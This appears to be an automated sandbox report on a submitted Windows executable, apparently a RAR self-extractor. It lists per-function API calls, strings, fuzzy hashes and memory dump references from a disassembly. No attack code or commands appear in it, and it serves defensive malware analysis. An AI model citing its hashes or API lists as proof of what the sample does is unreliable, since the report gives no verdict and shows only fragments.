                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 4e34965928f57ed7ac363a4c8b1e1935a88021cc67230775db9ec2f5c8d32371
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 04115B7722404243D6088A7ED7B46FBA3DDEBC633472C437AD3524B7DCD222E9459900
                                                              Function 009A3EAA Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 009A3EEA
                                                                • Part of subcall function 0099F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0099F6CD
                                                                • Part of subcall function 009A89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,009DE088,?,00000007,009A33E2,?,?,00000050,1AC349C0), ref: 009A8A0A
                                                              • _strlen.LIBCMT ref: 009A3F0B
                                                              • SetDlgItemTextW.USER32(?,009D919C,?), ref: 009A3F64
                                                              • GetWindowRect.USER32(?,?), ref: 009A3F9A
                                                              • GetClientRect.USER32(?,?), ref: 009A3FA6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 009A4051
                                                              • GetWindowRect.USER32(?,?), ref: 009A4081
                                                              • SetWindowTextW.USER32(?,?), ref: 009A40B0
                                                              • GetSystemMetrics.USER32(00000008), ref: 009A40B8
                                                              • GetWindow.USER32(?,00000005), ref: 009A40C3
                                                              • GetWindowRect.USER32(00000000,?), ref: 009A40F3
                                                              • GetWindow.USER32(00000000,00000002), ref: 009A4165
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d
                                                              • API String ID: 2407758923-2512411981
                                                              • Opcode ID: dc6c256526f1d2b86afc8c2172a90af8cc168ecda7342bf83c9b080f8c85dfd2
                                                              • Instruction ID: e635ddb0e0df0acace5cc82a96e6ed2ea698f8c19629eb6c89516dd19e0dd1fb
                                                              • Opcode Fuzzy Hash: dc6c256526f1d2b86afc8c2172a90af8cc168ecda7342bf83c9b080f8c85dfd2
                                                              • Instruction Fuzzy Hash: C4819A72508341AFD714DFA8CD89B6BBBE9EBC9704F00491DF98597290D770E9098B92
                                                              Function 009B61A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(009E60E0,00000FA0,?,?,009B6185), ref: 009B61B3
                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,009B6185), ref: 009B61BE
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,009B6185), ref: 009B61CF
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009B61E1
                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009B61EF
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009B6185), ref: 009B6212
                                                              • DeleteCriticalSection.KERNEL32(009E60E0,00000007,?,?,009B6185), ref: 009B6235
                                                              • CloseHandle.KERNEL32(00000000,?,?,009B6185), ref: 009B6245
                                                              Strings
                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009B61B9
                                                              • SleepConditionVariableCS, xrefs: 009B61DB
                                                              • WakeAllConditionVariable, xrefs: 009B61E7
                                                              • kernel32.dll, xrefs: 009B61CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                              • API String ID: 2565136772-3242537097
                                                              • Opcode ID: 470e8c0f12ba3bf62f24282792997e86e88815fd164dcafebd3dcbcde84d3f88
                                                              • Instruction ID: 6c6a248703970b48c0834e63b3aedc1b0b8946582e1018c625eb1c765fd1537b
                                                              • Opcode Fuzzy Hash: 470e8c0f12ba3bf62f24282792997e86e88815fd164dcafebd3dcbcde84d3f88
                                                              • Instruction Fuzzy Hash: 2E014CB0EA8321EBDF219B776D0DF963E5CFB94B927004414F81AD2250DA64EC009A31
                                                              Function 009C37D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 009C3816
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33CE
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33E0
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C33F2
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3404
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3416
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3428
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C343A
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C344C
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C345E
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3470
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3482
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C3494
                                                                • Part of subcall function 009C33B1: _free.LIBCMT ref: 009C34A6
                                                              • _free.LIBCMT ref: 009C380B
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009C382D
                                                              • _free.LIBCMT ref: 009C3842
                                                              • _free.LIBCMT ref: 009C384D
                                                              • _free.LIBCMT ref: 009C386F
                                                              • _free.LIBCMT ref: 009C3882
                                                              • _free.LIBCMT ref: 009C3890
                                                              • _free.LIBCMT ref: 009C389B
                                                              • _free.LIBCMT ref: 009C38D3
                                                              • _free.LIBCMT ref: 009C38DA
                                                              • _free.LIBCMT ref: 009C38F7
                                                              • _free.LIBCMT ref: 009C390F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 81533b92850e3a549303970e143cc4b29ea6a2c95b782922e3b4ef916bf143d3
                                                              • Instruction ID: 5fc17042e0b3cc23e8e648bb22d06e7277fcb24c59abd463245ce2108e981445
                                                              • Opcode Fuzzy Hash: 81533b92850e3a549303970e143cc4b29ea6a2c95b782922e3b4ef916bf143d3
                                                              • Instruction Fuzzy Hash: 03313931E04344DFEB21AA79E845F5AB3E9EF80310F14C42DF458E7551DAB1AA44CB22
                                                              Function 009AD912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AD919
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              • _wcslen.LIBCMT ref: 009AD97B
                                                              • _wcslen.LIBCMT ref: 009AD99A
                                                              • _wcslen.LIBCMT ref: 009AD9B6
                                                              • _strlen.LIBCMT ref: 009ADA14
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,009CD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 009ADA2D
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 009ADA54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 1185167184-1533471033
                                                              • Opcode ID: 813048a5bc28a55a5df251349f9a70a6d6de13c23710fb751f8ddce643149e5f
                                                              • Instruction ID: cf1c1c2d72a45ab07ede19450a457e5f0f9d758dbd0c4f63bb80c9ffd3e06021
                                                              • Opcode Fuzzy Hash: 813048a5bc28a55a5df251349f9a70a6d6de13c23710fb751f8ddce643149e5f
                                                              • Instruction Fuzzy Hash: CF514F71D02219AFEF04EBA4CC86FEEBBB9EF96310F140019E505AB181DB705E45CBA5
                                                              Function 009B3796 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 009B37C4
                                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 009B37F0
                                                                • Part of subcall function 009A8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,009A0E3F,?,?,?,00000046,009A1ECE,00000046,?,exe,00000046), ref: 009A8DBA
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009B380C
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 009B3823
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 009B3837
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 009B3860
                                                              • DeleteObject.GDI32(00000000), ref: 009B3867
                                                              • GetWindow.USER32(00000000,00000002), ref: 009B3870
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 8b64c0761a8f283b1f41f0b5e2c5f63ee616d42eff335140aaf481870ac05e36
                                                              • Instruction ID: d466b9278b8da0620a9c8cbcc032a8a6448b3453dfdb9ad402cddc33e6123f1e
                                                              • Opcode Fuzzy Hash: 8b64c0761a8f283b1f41f0b5e2c5f63ee616d42eff335140aaf481870ac05e36
                                                              • Instruction Fuzzy Hash: 1721077255C7507BE220EB649C8AFEFB69CAF85720F004525FA01AA1D1DB309D0556E7
                                                              Function 009BFF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 009BFF25
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009BFF31
                                                              • _free.LIBCMT ref: 009BFF3C
                                                              • _free.LIBCMT ref: 009BFF47
                                                              • _free.LIBCMT ref: 009BFF52
                                                              • _free.LIBCMT ref: 009BFF5D
                                                              • _free.LIBCMT ref: 009BFF68
                                                              • _free.LIBCMT ref: 009BFF73
                                                              • _free.LIBCMT ref: 009BFF7E
                                                              • _free.LIBCMT ref: 009BFF8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 07b8180ca6ef3564ca4dfb079e6b725fed88d5d6bc15846fb80d8ec07ba757c4
                                                              • Instruction ID: 67fe88378b145b4fedcdf113f60b22c5f40ba869de5776156fea57055a02e57b
                                                              • Opcode Fuzzy Hash: 07b8180ca6ef3564ca4dfb079e6b725fed88d5d6bc15846fb80d8ec07ba757c4
                                                              • Instruction Fuzzy Hash: 0B11777591428CFFDF01FF94C942EDD3BA5EF84350F5140A9BA085B162D671DA50DB41
                                                              Function 009B9AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: 322eb30f076470d9208f8990fb42e5186462fbf2e13121dd86e44d520f78ea20
                                                              • Instruction ID: 420f35bf7fa2daea9e22bb14496a1df3a4093c6a6c6d4a6ea450febdafbe9354
                                                              • Opcode Fuzzy Hash: 322eb30f076470d9208f8990fb42e5186462fbf2e13121dd86e44d520f78ea20
                                                              • Instruction Fuzzy Hash: 2BB19C35820219EFCF14DFA5DA81AEEBBB9FF84320F14445AFA056B252D730DA51CB91
                                                              Function 0099D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099D99A
                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0099D9BF
                                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 0099DA11
                                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0099DA34
                                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 0099DA84
                                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 0099DC9F
                                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 0099DCEC
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                              • String ID: rtmp
                                                              • API String ID: 2388273531-870060881
                                                              • Opcode ID: 67d9a225ce3040e3d108c2a273955006141efa84a916612634c33545f7d21c0a
                                                              • Instruction ID: 61f942346cb74e069780dc994026936e13a9ff4b002163843504766b434cf14c
                                                              • Opcode Fuzzy Hash: 67d9a225ce3040e3d108c2a273955006141efa84a916612634c33545f7d21c0a
                                                              • Instruction Fuzzy Hash: B5B10470902259DACF20DFA8CC85BDDBBB9BF99305F444099E449A7291DB349F89CF60
                                                              Function 009A1E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3__wcslen
                                                              • String ID: .rar$exe$rar$sfx
                                                              • API String ID: 3251556500-630704357
                                                              • Opcode ID: 156e991f3e01ff7c2518499c6ca1d434a86978fdcc873c228509452479c6a3c6
                                                              • Instruction ID: 7e3a74b6380a0e93376c80c96d03378a47539b37605b65490ab08325741dd139
                                                              • Opcode Fuzzy Hash: 156e991f3e01ff7c2518499c6ca1d434a86978fdcc873c228509452479c6a3c6
                                                              • Instruction Fuzzy Hash: 2671A270A007559FCB21DF68C981BADB7F8EF8AB10F24091DF4859B291DB719942CBD1
                                                              Function 009B53D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,009A04AB,009A04AD,00000000,00000000,1AC349C0,00000001,00000000,00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5459
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,009A04AB,?,00000000,00000000,?,?,009A038C,?,00000004,009A04AB), ref: 009B54D4
                                                              • SysAllocString.OLEAUT32(00000000), ref: 009B54DF
                                                              • _com_issue_error.COMSUPP ref: 009B5508
                                                              • _com_issue_error.COMSUPP ref: 009B5512
                                                              • GetLastError.KERNEL32(80070057,1AC349C0,00000001,00000000,00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5517
                                                              • _com_issue_error.COMSUPP ref: 009B552A
                                                              • GetLastError.KERNEL32(00000000,?,009A038C,?,00000004,009A04AB,ROOT\CIMV2), ref: 009B5540
                                                              • _com_issue_error.COMSUPP ref: 009B5553
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 516c224ec1c3491263cebe4139682f5b2f982f96f29213f2f2a660a3a295681b
                                                              • Instruction ID: 7de90756ef1387bcf9951efafa7af7d80d238001f92526a2ae9cd9fa5b374812
                                                              • Opcode Fuzzy Hash: 516c224ec1c3491263cebe4139682f5b2f982f96f29213f2f2a660a3a295681b
                                                              • Instruction Fuzzy Hash: 1F4106B1A00604EBCB10DF68DE45BEEBBE9EB88731F114229F509E7290D775D940CBA4
                                                              Function 009A0469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A0470
                                                                • Part of subcall function 009A0360: __EH_prolog3.LIBCMT ref: 009A0367
                                                              • VariantClear.OLEAUT32(?), ref: 009A05FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ClearVariant
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 4196654922-3505469590
                                                              • Opcode ID: 9f37451feb614b73d9371fe2b6146b6df840effba586759e59be8637b828c8c3
                                                              • Instruction ID: 423aca415dc9e042b767495f81106442e16831bd98b84faaa553d10fae9ca435
                                                              • Opcode Fuzzy Hash: 9f37451feb614b73d9371fe2b6146b6df840effba586759e59be8637b828c8c3
                                                              • Instruction Fuzzy Hash: 90611B71E10219AFDB14DFA4CC95EAEBBB9FF89714B14055CF516A72A0CB30AD01DBA0
                                                              Function 009AE07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_wcslen
                                                              • String ID: $</p>$</style>$<br>$<style>
                                                              • API String ID: 3746244732-3393513139
                                                              • Opcode ID: 15b0306e50039745a6fda10ecc5ad60d826c700779b79a60dd44e42dc70a7804
                                                              • Instruction ID: 2881a643a923fddd9b83179e35a659747128d95cd03610bd664ad27df469066b
                                                              • Opcode Fuzzy Hash: 15b0306e50039745a6fda10ecc5ad60d826c700779b79a60dd44e42dc70a7804
                                                              • Instruction Fuzzy Hash: 09514775B4832397DB309A24886177673A9AFA7755F580019FCC1AB2C0EB758D80C3D1
                                                              Function 009B06D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009B0720
                                                              • SendMessageW.USER32(?,00000080,00000001,000103E5), ref: 009B0747
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,17050D3A), ref: 009B0760
                                                              • GetDlgItem.USER32(?,00000065), ref: 009B077C
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 009B0790
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 009B07A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
